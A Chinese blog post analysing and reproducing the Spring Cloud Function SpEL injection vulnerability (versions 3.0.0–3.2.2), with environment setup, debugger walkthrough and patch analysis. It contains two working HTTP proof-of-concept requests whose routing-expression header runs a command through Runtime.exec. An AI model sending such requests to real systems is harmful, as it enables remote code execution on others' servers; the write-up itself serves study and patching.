<!DOCTYPE html>
<html lang="zh-CN" color-mode="light">

  <head>
  <meta charset="utf-8">
  <meta name="viewport" content="width=device-width, initial-scale=1" />
  <meta name="keywords" content="" />
  <meta name="author" content="kpa1on" />
  <meta name="description" content="kpa1onの博客" />
  
  
  <title>
    
      Spring Cloud Function SpEL漏洞分析及复现 
      
      
      |
    
     kpa1on&#39;s Blog
  </title>

  
    <link rel="apple-touch-icon" href="/images/favicon.png">
    <link rel="icon" href="/images/favicon.png">
  

  <!-- Raleway-Font -->
  <link href="https://fonts.googleapis.com/css?family=Raleway&display=swap" rel="stylesheet">

  <!-- hexo site css -->
  <link rel="stylesheet" href="/css/main.css" />
  <link rel="stylesheet" href="//at.alicdn.com/t/font_1886449_67xjft27j1l.css" />
  <!-- 代码块风格 -->
  

  <!-- jquery3.3.1 -->
  
    <script defer type="text/javascript" src="/plugins/jquery.min.js"></script>
  

  <!-- fancybox -->
  
    <link href="/plugins/jquery.fancybox.min.css" rel="stylesheet">
    <script defer type="text/javascript" src="/plugins/jquery.fancybox.min.js"></script>
  
  
<script src="/js/fancybox.js"></script>


  

  

  <script>
    var html = document.documentElement
    const colorMode = localStorage.getItem('color-mode')
    if (colorMode) {
      document.documentElement.setAttribute('color-mode', colorMode)
    }
  </script>
<meta name="generator" content="Hexo 6.0.0"><link rel="alternate" href="/atom.xml" title="kpa1on's Blog" type="application/atom+xml">
</head>


  <body>
    <div id="app">
      <div class="header">
  <div class="avatar">
    <a href="/">
      <!-- 头像取消懒加载，添加no-lazy -->
      
        <img src="/images/avatar.png" alt="">
      
    </a>
    <div class="nickname"><a href="/">kpa1on</a></div>
  </div>
  <div class="navbar">
    <ul>
      
        <li class="nav-item" data-path="/">
          <a href="/">Home</a>
        </li>
      
        <li class="nav-item" data-path="/archives/">
          <a href="/archives/">Archives</a>
        </li>
      
        <li class="nav-item" data-path="/categories/">
          <a href="/categories/">Categories</a>
        </li>
      
        <li class="nav-item" data-path="/tags/">
          <a href="/tags/">Tags</a>
        </li>
      
        <li class="nav-item" data-path="/friends/">
          <a href="/friends/">Friends</a>
        </li>
      
        <li class="nav-item" data-path="/about/">
          <a href="/about/">About</a>
        </li>
      
    </ul>
  </div>
</div>


<script src="/js/activeNav.js"></script>



      <div class="flex-container">
        <!-- 文章详情页，展示文章具体内容，url形式：https://yoursite/文章标题/ -->
<!-- 同时为「标签tag」，「朋友friend」，「分类categories」，「关于about」页面的承载页面，具体展示取决于page.type -->


  <!-- LaTex Display -->

  
    <script async type="text/javascript" src="/plugins/mathjax/tex-chtml.js"></script>
  
  <script>
    MathJax = {
      tex: {
        inlineMath: [['$', '$'], ['\\(', '\\)']]
      }
    }
  </script>





  <!-- clipboard -->

  
    <script async type="text/javascript" src="/plugins/clipboard.min.js"></script>
  
  
<script src="/js/codeCopy.js"></script>







  

  

  

  
  <!-- 文章内容页 url形式：https://yoursite/文章标题/ -->
  <div class="container post-details" id="post-details">
    <div class="post-content">
      <div class="post-title">Spring Cloud Function SpEL漏洞分析及复现</div>
      <div class="post-attach">
        <span class="post-pubtime">
          <i class="iconfont icon-updatetime mr-10" title="更新时间"></i>
          2022-03-29 09:56:43
        </span>
        
              <span class="post-tags">
                <i class="iconfont icon-tags mr-10" title="标签"></i>
                
                <span class="span--tag mr-8">
                  <a href="/tags/SpEL/" title="SpEL">
                    #SpEL
                  </a>
                </span>
                
                <span class="span--tag mr-8">
                  <a href="/tags/%E6%BC%8F%E6%B4%9E%E5%A4%8D%E7%8E%B0/" title="漏洞复现">
                    #漏洞复现
                  </a>
                </span>
                
              </span>
          
      </div>
      <div class="markdown-body">
        <meta name="referrer" content="no-referrer"/>

<h3 id="漏洞情况"><a href="#漏洞情况" class="headerlink" title="漏洞情况"></a>漏洞情况</h3><p>当<code>Spring Cloud Function</code> 启用动态路由<code>functionRouter</code>时，由于<code>Spring Cloud  Function</code>中<code>RoutingFunction</code>类的apply方法将请求头中的<code>spring.cloud.function.routing-expression</code>参数作为Spel表达式进行处理，造成了Spel表达式注入漏洞，攻击者可利用该漏洞远程执行任意代码。</p>
<span id="more"></span>

<h3 id="影响范围"><a href="#影响范围" class="headerlink" title="影响范围"></a>影响范围</h3><p>3.0.0.RELEASE &lt;&#x3D; Spring Cloud Function &lt;&#x3D; 3.2.2</p>
<h3 id="环境搭建"><a href="#环境搭建" class="headerlink" title="环境搭建"></a>环境搭建</h3><p>官方的环境（需要修改pom.xml）：</p>
<p><a target="_blank" rel="noopener" href="https://github.com/spring-cloud/spring-cloud-function/tree/main/spring-cloud-function-samples/function-sample-pojo">https://github.com/spring-cloud/spring-cloud-function/tree/main/spring-cloud-function-samples/function-sample-pojo</a></p>
<p>cckuailong师傅创建的环境（需要jdk17）：</p>
<p><a target="_blank" rel="noopener" href="https://github.com/cckuailong/spring-cloud-function-SpEL-RCE">https://github.com/cckuailong/spring-cloud-function-SpEL-RCE</a></p>
<p>jwwam师傅的环境（可以jdk8，需要修改pom.xml）：</p>
<p><a target="_blank" rel="noopener" href="https://github.com/jwwam/scfunc">https://github.com/jwwam/scfunc</a></p>
<p>或者下载jar包运行（需要jdk11）：「SpringCloud-Function-0.0.1-SNAPSHOT.jar」<a target="_blank" rel="noopener" href="https://www.aliyundrive.com/s/m8evrX31CkU">https://www.aliyundrive.com/s/m8evrX31CkU</a></p>
<p>修改pom.xml</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br><span class="line">72</span><br><span class="line">73</span><br><span class="line">74</span><br><span class="line">75</span><br><span class="line">76</span><br><span class="line">77</span><br><span class="line">78</span><br><span class="line">79</span><br><span class="line">80</span><br><span class="line">81</span><br><span class="line">82</span><br><span class="line">83</span><br><span class="line">84</span><br><span class="line">85</span><br><span class="line">86</span><br><span class="line">87</span><br><span class="line">88</span><br><span class="line">89</span><br></pre></td><td class="code"><pre><span class="line">&lt;?xml version=&quot;1.0&quot; encoding=&quot;UTF-8&quot;?&gt;</span><br><span class="line">&lt;project xmlns:xsi=&quot;http://www.w3.org/2001/XMLSchema-instance&quot;</span><br><span class="line">		 xmlns=&quot;http://maven.apache.org/POM/4.0.0&quot;</span><br><span class="line">		 xsi:schemaLocation=&quot;http://maven.apache.org/POM/4.0.0 https://maven.apache.org/xsd/maven-4.0.0.xsd&quot;&gt;</span><br><span class="line">	&lt;modelVersion&gt;4.0.0&lt;/modelVersion&gt;</span><br><span class="line"></span><br><span class="line">	&lt;groupId&gt;io.spring.sample&lt;/groupId&gt;</span><br><span class="line">	&lt;artifactId&gt;function-sample-pojo&lt;/artifactId&gt;</span><br><span class="line">	&lt;version&gt;3.2.1.RELEASE&lt;/version&gt;</span><br><span class="line">	&lt;packaging&gt;jar&lt;/packaging&gt;</span><br><span class="line">	&lt;name&gt;function-sample-pojo&lt;/name&gt;</span><br><span class="line">	&lt;description&gt;Spring Cloud Function Web Support&lt;/description&gt;</span><br><span class="line"></span><br><span class="line">	&lt;parent&gt;</span><br><span class="line">		&lt;groupId&gt;org.springframework.boot&lt;/groupId&gt;</span><br><span class="line">		&lt;artifactId&gt;spring-boot-starter-parent&lt;/artifactId&gt;</span><br><span class="line">		&lt;version&gt;3.0.0-SNAPSHOT&lt;/version&gt;</span><br><span class="line">		&lt;relativePath/&gt;</span><br><span class="line">	&lt;/parent&gt;</span><br><span class="line"></span><br><span class="line">	&lt;properties&gt;</span><br><span class="line">		&lt;spring-cloud-function.version&gt;3.2.1-SNAPSHOT&lt;/spring-cloud-function.version&gt;</span><br><span class="line">		&lt;wrapper.version&gt;1.0.27.RELEASE&lt;/wrapper.version&gt;</span><br><span class="line">	&lt;/properties&gt;</span><br><span class="line"></span><br><span class="line">	&lt;dependencies&gt;</span><br><span class="line">		&lt;dependency&gt;</span><br><span class="line">			&lt;groupId&gt;org.springframework.cloud&lt;/groupId&gt;</span><br><span class="line">			&lt;artifactId&gt;spring-cloud-starter-function-webflux&lt;/artifactId&gt;</span><br><span class="line">		&lt;/dependency&gt;</span><br><span class="line">		&lt;dependency&gt;</span><br><span class="line">			&lt;groupId&gt;org.springframework.boot&lt;/groupId&gt;</span><br><span class="line">			&lt;artifactId&gt;spring-boot-configuration-processor&lt;/artifactId&gt;</span><br><span class="line">			&lt;optional&gt;true&lt;/optional&gt;</span><br><span class="line">		&lt;/dependency&gt;</span><br><span class="line">		&lt;dependency&gt;</span><br><span class="line">			&lt;groupId&gt;org.springframework.boot&lt;/groupId&gt;</span><br><span class="line">			&lt;artifactId&gt;spring-boot-starter-test&lt;/artifactId&gt;</span><br><span class="line">			&lt;scope&gt;test&lt;/scope&gt;</span><br><span class="line">		&lt;/dependency&gt;</span><br><span class="line">	&lt;/dependencies&gt;</span><br><span class="line"></span><br><span class="line">	&lt;dependencyManagement&gt;</span><br><span class="line">		&lt;dependencies&gt;</span><br><span class="line">			&lt;dependency&gt;</span><br><span class="line">				&lt;groupId&gt;org.springframework.cloud&lt;/groupId&gt;</span><br><span class="line">				&lt;artifactId&gt;spring-cloud-function-dependencies&lt;/artifactId&gt;</span><br><span class="line">				&lt;version&gt;$&#123;spring-cloud-function.version&#125;&lt;/version&gt;</span><br><span class="line">				&lt;type&gt;pom&lt;/type&gt;</span><br><span class="line">				&lt;scope&gt;import&lt;/scope&gt;</span><br><span class="line">			&lt;/dependency&gt;</span><br><span class="line">		&lt;/dependencies&gt;</span><br><span class="line">	&lt;/dependencyManagement&gt;</span><br><span class="line"></span><br><span class="line">	&lt;build&gt;</span><br><span class="line">		&lt;plugins&gt;</span><br><span class="line">			&lt;plugin&gt;</span><br><span class="line">				&lt;groupId&gt;org.apache.maven.plugins&lt;/groupId&gt;</span><br><span class="line">				&lt;artifactId&gt;maven-deploy-plugin&lt;/artifactId&gt;</span><br><span class="line">				&lt;configuration&gt;</span><br><span class="line">					&lt;skip&gt;true&lt;/skip&gt;</span><br><span class="line">				&lt;/configuration&gt;</span><br><span class="line">			&lt;/plugin&gt;</span><br><span class="line">			&lt;plugin&gt;</span><br><span class="line">				&lt;groupId&gt;org.springframework.boot&lt;/groupId&gt;</span><br><span class="line">				&lt;artifactId&gt;spring-boot-maven-plugin&lt;/artifactId&gt;</span><br><span class="line">				&lt;dependencies&gt;</span><br><span class="line">					&lt;dependency&gt;</span><br><span class="line">						&lt;groupId&gt;org.springframework.boot.experimental&lt;/groupId&gt;</span><br><span class="line">						&lt;artifactId&gt;spring-boot-thin-layout&lt;/artifactId&gt;</span><br><span class="line">						&lt;version&gt;$&#123;wrapper.version&#125;&lt;/version&gt;</span><br><span class="line">					&lt;/dependency&gt;</span><br><span class="line">				&lt;/dependencies&gt;</span><br><span class="line">			&lt;/plugin&gt;</span><br><span class="line">			&lt;plugin&gt;</span><br><span class="line">				&lt;artifactId&gt;maven-surefire-plugin&lt;/artifactId&gt;</span><br><span class="line">				&lt;configuration&gt;</span><br><span class="line">					&lt;includes&gt;</span><br><span class="line">						&lt;include&gt;**/*Tests.java&lt;/include&gt;</span><br><span class="line">						&lt;include&gt;**/*Test.java&lt;/include&gt;</span><br><span class="line">					&lt;/includes&gt;</span><br><span class="line">					&lt;excludes&gt;</span><br><span class="line">						&lt;exclude&gt;**/Abstract*.java&lt;/exclude&gt;</span><br><span class="line">					&lt;/excludes&gt;</span><br><span class="line">				&lt;/configuration&gt;</span><br><span class="line">			&lt;/plugin&gt;</span><br><span class="line">		&lt;/plugins&gt;</span><br><span class="line">	&lt;/build&gt;</span><br><span class="line">&lt;/project&gt;</span><br></pre></td></tr></table></figure>

<p>拉取仓库后用IDEA maven进行打包调试即可。</p>
<h3 id="漏洞复现"><a href="#漏洞复现" class="headerlink" title="漏洞复现"></a>漏洞复现</h3><p><a target="_blank" rel="noopener" href="https://github.com/spring-cloud/spring-cloud-function/commit/0e89ee27b2e76138c16bcba6f4bca906c4f3744f">https://github.com/spring-cloud/spring-cloud-function/commit/0e89ee27b2e76138c16bcba6f4bca906c4f3744f</a></p>
<p>可以看到官方给的测试用例如下：</p>
<p><img src="https://img2022.cnblogs.com/blog/1993367/202203/1993367-20220330010520987-258020339.png" alt="image-20220330010520323"></p>
<p>有个核心的地方就是设置一个请求头</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">setHeader(FunctionProperties.PREFIX + &quot;.routing-expression&quot;,&quot;T(java.lang.Runtime).getRuntime().exec(\&quot;open -a calculator.app\&quot;)&quot;)</span><br></pre></td></tr></table></figure>

<p>请求头中的<code>FunctionProperties.PREFIX</code>为<code>spring.cloud.function</code></p>
<p><img src="https://img2022.cnblogs.com/blog/1993367/202203/1993367-20220330011359605-1752898534.png" alt="image-20220330011359150"></p>
<p>所以拼接起来，漏洞的利用是在请求的headers头上添加一个<code>spring.cloud.function.routing-expression</code>参数，然后会将其参数内容直接带入到SPEL中查询，造成SpEL漏洞注入。</p>
<p>POC1：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">POST / HTTP/1.1</span><br><span class="line">Host: 127.0.0.1:8080</span><br><span class="line">spring.cloud.function.routing-expression: T(java.lang.Runtime).getRuntime().exec(&quot;calc&quot;)</span><br><span class="line">Connection: close</span><br><span class="line">Content-Length: 0</span><br></pre></td></tr></table></figure>

<p><img src="https://img2022.cnblogs.com/blog/1993367/202203/1993367-20220330014710976-2126231147.png" alt="image-20220330014710218"></p>
<p>application.properties</p>
<p><img src="https://img2022.cnblogs.com/blog/1993367/202203/1993367-20220330111652281-1882515346.png" alt="image-20220330111652398"></p>
<p>POC2：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">POST /functionRouter HTTP/1.1</span><br><span class="line">Host: 127.0.0.1:8080</span><br><span class="line">spring.cloud.function.routing-expression: T(java.lang.Runtime).getRuntime().exec(&quot;calc&quot;)</span><br><span class="line">Connection: close</span><br><span class="line">Content-Length: 0</span><br></pre></td></tr></table></figure>

<p>application.properties</p>
<p><img src="https://img2022.cnblogs.com/blog/1993367/202203/1993367-20220330111716617-918890702.png" alt="image-20220330111716779"></p>
<h3 id="漏洞分析"><a href="#漏洞分析" class="headerlink" title="漏洞分析"></a>漏洞分析</h3><p>漏洞是出在<code>SpringCloud  Function</code>的<code>RoutingFunction</code>功能上，其功能的目的本身就是为了微服务应运而生的，可以直接通过HTTP请求与单个的函数进行交互，同时为<code>spring.cloud.function.definition</code>参数提供您要调用的函数的名称。</p>
<p>比如我们可以自定义一个函数，这里随意编写一个反转函数用来测试</p>
<p><img src="https://img2022.cnblogs.com/blog/1993367/202203/1993367-20220330020451902-1074931253.png" alt="image-20220330020451543"></p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">@Bean    //第一个String代表输入类型，第二个String代表输出类型</span><br><span class="line">	public Function&lt;String, String&gt; reverseString() &#123;</span><br><span class="line">		return value -&gt; new StringBuilder(value).reverse().toString();</span><br><span class="line">	&#125;</span><br></pre></td></tr></table></figure>

<p>通过在请求头中添加<code>spring.cloud.function.definition:</code> 函数名即可调用我们的函数</p>
<p><img src="https://img2022.cnblogs.com/blog/1993367/202203/1993367-20220330020325403-559736302.png" alt="image-20220330020324910"></p>
<p>下面分析漏洞利用的过程</p>
<h4 id="第1种利用：需要修改配置-任意路由"><a href="#第1种利用：需要修改配置-任意路由" class="headerlink" title="第1种利用：需要修改配置+任意路由"></a>第1种利用：需要修改配置+任意路由</h4><p>首先我们在漏洞利用的时候是先发起一个post请求的，因此，我们可以先查看后端的Controller层对提交的请求做了哪些操作</p>
<p>定位到控制层代码<code>org\springframework\cloud\function\web\mvc\FunctionController.java#post</code>方法，在此处打上断点</p>
<p><img src="https://img2022.cnblogs.com/blog/1993367/202203/1993367-20220330021314819-442313903.png" alt="image-20220330021314391"></p>
<p>点击调试按钮，burp发送poc</p>
<p><img src="https://img2022.cnblogs.com/blog/1993367/202203/1993367-20220330021659096-81060508.png" alt="image-20220330021658671"></p>
<p>此时停在了断点处，可以在Variables视图看到<code>spring.cloud.function.routing-expression</code>头的赋值情况</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">ServletWebRequest-&gt;HttpServletRequest-&gt;Request-&gt;MimeHeaders-&gt;headers-&gt;spring.cloud.function.routing-expression</span><br></pre></td></tr></table></figure>

<p><img src="https://img2022.cnblogs.com/blog/1993367/202203/1993367-20220330022344967-1509764902.png" alt="image-20220330022344082"></p>
<p>往下，程序会获取body中的参数，并传入processRequest方法中，在processRequest方法中会获取通过wrapper对象获取到请求头，并将请求体和请求头封装成inputMessage，接着调用<code>FunctionInvocationWrapper#isRoutingFunction</code>方法判断当前请求是否为RoutingFunction。</p>
<p><img src="https://img2022.cnblogs.com/blog/1993367/202203/1993367-20220330024427531-1408829946.png" alt="image-20220330024426871"></p>
<p>接着往下，通过<code>FunctionInvocationWrapper#apply</code>方法将请求的内容和Header头封装成的input带入到<code>FunctionInvocationWrapper.apply</code>方法中，随后又进入其中的doApply方法</p>
<p><img src="https://img2022.cnblogs.com/blog/1993367/202203/1993367-20220330024926370-1410073270.png" alt="image-20220330024925921"></p>
<p>在doApply方法中，会判断当前的RoutingFunction和Composed是否为true，如果是，则调用<code>RoutingFunction</code>的apply方法</p>
<p><img src="https://img2022.cnblogs.com/blog/1993367/202203/1993367-20220330025516556-343128977.png" alt="image-20220330025515539"></p>
<p>跟进apply方法，发现其调用了<code>RoutingFunction#route</code>方法</p>
<p><img src="https://img2022.cnblogs.com/blog/1993367/202203/1993367-20220330030219026-1186212549.png" alt="image-20220330030218623"></p>
<p>跟进route方法，if判断中，获取header请求头中的字段，判断是否存在<code>spring.cloud.function.definition</code>，若不存在则判断是否存在<code>spring.cloud.function.routing-expression</code>，如存在则调用<code>functionFromExpression</code>方法解析对应的值。</p>
<p><img src="https://img2022.cnblogs.com/blog/1993367/202203/1993367-20220330030845396-1989933020.png" alt="image-20220330030844758"></p>
<p>进入<code>functionFromExpression</code>方法中，可以看到通过<code>SpelExpressionParser</code>来解析内容，导致Spel表达式注入。</p>
<p><img src="https://img2022.cnblogs.com/blog/1993367/202203/1993367-20220330031309339-1389221856.png" alt="image-20220330031308676"></p>
<p>这里可以看到设置<code>EvaluationContext</code>的值是<code>StandardEvaluationContext</code>，而它包含了SpEL的所有功能，在允许用户控制输入的情况下可以成功造成任意命令执行。</p>
<p><img src="https://img2022.cnblogs.com/blog/1993367/202203/1993367-20220330031817613-1636925655.png" alt="image-20220330031816947"></p>
<p>如下，evalContext对象创建采用的是<code>StandardEvaluationContext</code></p>
<p><img src="https://img2022.cnblogs.com/blog/1993367/202203/1993367-20220330031931608-303862117.png" alt="image-20220330031931303"></p>
<h4 id="第2种利用：默认配置-特定路由"><a href="#第2种利用：默认配置-特定路由" class="headerlink" title="第2种利用：默认配置+特定路由"></a>第2种利用：默认配置+特定路由</h4><p>定位到<code>FunctionHandlerMapping.java#HandlerMethod</code>方法，方法中会获取请求的路径，然后调用<code>findFunction</code>方法</p>
<p><img src="https://img2022.cnblogs.com/blog/1993367/202203/1993367-20220330113254208-1412992217.png" alt="image-20220330113254178"></p>
<p>接着跟进<code>doFindFunction</code>方法</p>
<p><img src="https://img2022.cnblogs.com/blog/1993367/202203/1993367-20220330113801841-816435868.png" alt="image-20220330113801926"></p>
<p>后调用<code>FunctionCatalog#lookup</code>方法</p>
<p><img src="https://img2022.cnblogs.com/blog/1993367/202203/1993367-20220330114045130-2137151268.png" alt="image-20220330114045221"></p>
<p>继续跟进lookup方法</p>
<p><img src="https://img2022.cnblogs.com/blog/1993367/202203/1993367-20220330114158324-1902508255.png" alt="image-20220330114158564"></p>
<p>又调用dolookup方法</p>
<p><img src="https://img2022.cnblogs.com/blog/1993367/202203/1993367-20220330114259775-395682282.png" alt="image-20220330114259887"></p>
<p>dolookup方法大概是在为function进行赋值</p>
<p><img src="https://img2022.cnblogs.com/blog/1993367/202203/1993367-20220330114554904-1169967782.png" alt="image-20220330114554987"></p>
<p>返回function之后，往下走，在<code>discoverFunctionInBeanFactory</code>方法处，做了一个类似于查询的操作，查找bean工厂中是否有functionRouter，如果有就返回，这里可以看到返回了RoutingFunction对象（经过调试，如果这里没有查询到，后面就返回null，就不会结果post方法进行后续的调用，也就是不会触发SpEL表达式注入）</p>
<p><img src="https://img2022.cnblogs.com/blog/1993367/202203/1993367-20220330171823760-496272863.png" alt="image-20220330171824010"></p>
<p>最后调用父类的doLookup方法，返回function对象</p>
<p><img src="https://img2022.cnblogs.com/blog/1993367/202203/1993367-20220330172321169-1154231931.png" alt="image-20220330172321312"></p>
<p>返回之后，回到<code>FunctionWebRequestProcessingHelper.java</code>类调用<code>doFindFunction</code>方法</p>
<p><img src="https://img2022.cnblogs.com/blog/1993367/202203/1993367-20220330172418160-1118719027.png" alt="image-20220330172418514"></p>
<p>继续往下就回到了<code>FunctionHandlerMapping.java#getHandlerInternal</code>方法，将function保存到request的作用域中</p>
<p><img src="https://img2022.cnblogs.com/blog/1993367/202203/1993367-20220330172639513-1230584586.png" alt="image-20220330172639853"></p>
<p>最后经过一连串的F8，就到了熟悉的post方法，后续的步骤就是一样的了</p>
<p><img src="https://img2022.cnblogs.com/blog/1993367/202203/1993367-20220330173056936-17926663.png" alt="image-20220330173057185"></p>
<h3 id="补丁分析"><a href="#补丁分析" class="headerlink" title="补丁分析"></a>补丁分析</h3><p>在补丁中，通过<code>SimpleEvaluationContext</code>来构建<code>EvalContext</code>对象</p>
<p><img src="https://img2022.cnblogs.com/blog/1993367/202203/1993367-20220330032522641-247909414.png" alt="image-20220330032522050"></p>
<p>在<code>functionFromExpression</code>函数中添加了一个boolean型的参数</p>
<p><img src="https://img2022.cnblogs.com/blog/1993367/202203/1993367-20220330033300387-1490197489.png" alt="image-20220330033300034"></p>
<p>根据传入的值为true，即调用<code>getValue(this.headerEvalContext, input, String.class)</code>，也就防止SpEL注入的发生。</p>
<p><img src="https://img2022.cnblogs.com/blog/1993367/202203/1993367-20220330033426315-574243917.png" alt="image-20220330033425927"></p>
<h3 id="参考"><a href="#参考" class="headerlink" title="参考"></a>参考</h3><p><a target="_blank" rel="noopener" href="https://www.cnblogs.com/wh4am1/p/16062306.html">https://www.cnblogs.com/wh4am1/p/16062306.html</a></p>
<p><a target="_blank" rel="noopener" href="https://mp.weixin.qq.com/s/O2vJmMgqrQp5RTLwvZ5X_w">https://mp.weixin.qq.com/s/O2vJmMgqrQp5RTLwvZ5X_w</a></p>
<p><a target="_blank" rel="noopener" href="https://mp.weixin.qq.com/s/2gKqp3YJtZJ7MMtbkHhOBA">https://mp.weixin.qq.com/s/2gKqp3YJtZJ7MMtbkHhOBA</a></p>
<p><a target="_blank" rel="noopener" href="https://mp.weixin.qq.com/s/U7YJ3FttuWSOgCodVSqemg">https://mp.weixin.qq.com/s/U7YJ3FttuWSOgCodVSqemg</a></p>

      </div>
      
        <div class="prev-or-next">
          <div class="post-foot-next">
            
              <a href="/2022/03/24/Java%E5%AE%89%E5%85%A8%E4%B9%8BURLDNS%E9%93%BE/" target="_self">
                <i class="iconfont icon-chevronleft"></i>
                <span>上一页</span>
              </a>
            
          </div>
          <div class="post-attach">
            <span class="post-pubtime">
              <i class="iconfont icon-updatetime mr-10" title="更新时间"></i>
              2022-03-29 09:56:43
            </span>
            
                  <span class="post-tags">
                    <i class="iconfont icon-tags mr-10" title="标签"></i>
                    
                    <span class="span--tag mr-8">
                      <a href="/tags/SpEL/" title="SpEL">
                        #SpEL
                      </a>
                    </span>
                    
                    <span class="span--tag mr-8">
                      <a href="/tags/%E6%BC%8F%E6%B4%9E%E5%A4%8D%E7%8E%B0/" title="漏洞复现">
                        #漏洞复现
                      </a>
                    </span>
                    
                  </span>
              
          </div>
          <div class="post-foot-prev">
            
              <a href="/2022/03/29/SpEL%E8%A1%A8%E8%BE%BE%E5%BC%8F%E6%B3%A8%E5%85%A5%E5%AD%A6%E4%B9%A0/" target="_self">
                <span>下一页</span>
                <i class="iconfont icon-chevronright"></i>
              </a>
            
          </div>
        </div>
      
    </div>
    
  <div id="btn-catalog" class="btn-catalog">
    <i class="iconfont icon-catalog"></i>
  </div>
  <div class="post-catalog hidden" id="catalog">
    <div class="title">目录</div>
    <div class="catalog-content">
      
        <ol class="toc"><li class="toc-item toc-level-3"><a class="toc-link" href="#%E6%BC%8F%E6%B4%9E%E6%83%85%E5%86%B5"><span class="toc-text">漏洞情况</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E5%BD%B1%E5%93%8D%E8%8C%83%E5%9B%B4"><span class="toc-text">影响范围</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E7%8E%AF%E5%A2%83%E6%90%AD%E5%BB%BA"><span class="toc-text">环境搭建</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E6%BC%8F%E6%B4%9E%E5%A4%8D%E7%8E%B0"><span class="toc-text">漏洞复现</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E6%BC%8F%E6%B4%9E%E5%88%86%E6%9E%90"><span class="toc-text">漏洞分析</span></a><ol class="toc-child"><li class="toc-item toc-level-4"><a class="toc-link" href="#%E7%AC%AC1%E7%A7%8D%E5%88%A9%E7%94%A8%EF%BC%9A%E9%9C%80%E8%A6%81%E4%BF%AE%E6%94%B9%E9%85%8D%E7%BD%AE-%E4%BB%BB%E6%84%8F%E8%B7%AF%E7%94%B1"><span class="toc-text">第1种利用：需要修改配置+任意路由</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#%E7%AC%AC2%E7%A7%8D%E5%88%A9%E7%94%A8%EF%BC%9A%E9%BB%98%E8%AE%A4%E9%85%8D%E7%BD%AE-%E7%89%B9%E5%AE%9A%E8%B7%AF%E7%94%B1"><span class="toc-text">第2种利用：默认配置+特定路由</span></a></li></ol></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E8%A1%A5%E4%B8%81%E5%88%86%E6%9E%90"><span class="toc-text">补丁分析</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E5%8F%82%E8%80%83"><span class="toc-text">参考</span></a></li></ol>
      
    </div>
  </div>

  
<script src="/js/catalog.js"></script>




    
      <div class="comments-container">
        




  
    <script async type="text/javascript" src="/plugins/valine.min.js" onload="loadValineSuc(this)"></script>
  

  <div id="vcomments"></div>

  <script>
    function loadValineSuc() {
      new Valine({
        el: '#vcomments',
        appId: 'jPbyyPRfIcmK2hNkMjSLsXfP-gzGzoHsz',
        appKey: 'YneEpeV8uvQHiRDwOB9Yh4US',
        placeholder: 'Welcome!',
        avatar: 'retro',
        lang: 'zh-CN'
      })
    }
  </script>

    <style>
      .comments-container .v .vempty {
        display: none!important;
      }
    </style>




      </div>
    
  </div>


        
<div class="footer">
  <div class="social">
    <ul>
      
        <li>
          <a title="github" target="_blank" rel="noopener" href="https://github.com/kpa1on">
            <i class="iconfont icon-github"></i>
          </a>
        </li>
      
    </ul>
  </div>
  
    
    <div class="footer-more">
      
        <a target="_blank" rel="noopener" href="https://github.com/zchengsite/hexo-theme-oranges">Copyright © 2022 Oranges</a>
        
    </div>
  
    
    <div class="footer-more">
      
        <a target="_blank" rel="noopener" href="https://github.com/zchengsite/hexo-theme-oranges">Theme by Oranges | Powered by Hexo</a>
        
    </div>
  
  
</div>

      </div>

      <div class="tools-bar">
        <div class="back-to-top tools-bar-item hidden">
  <a href="javascript: void(0)">
    <i class="iconfont icon-chevronup"></i>
  </a>
</div>


<script src="/js/backtotop.js"></script>



        
  <div class="search-icon tools-bar-item" id="search-icon">
    <a href="javascript: void(0)">
      <i class="iconfont icon-search"></i>
    </a>
  </div>

  <div class="search-overlay hidden">
    <div class="search-content" tabindex="0">
      <div class="search-title">
        <span class="search-icon-input">
          <a href="javascript: void(0)">
            <i class="iconfont icon-search"></i>
          </a>
        </span>
        
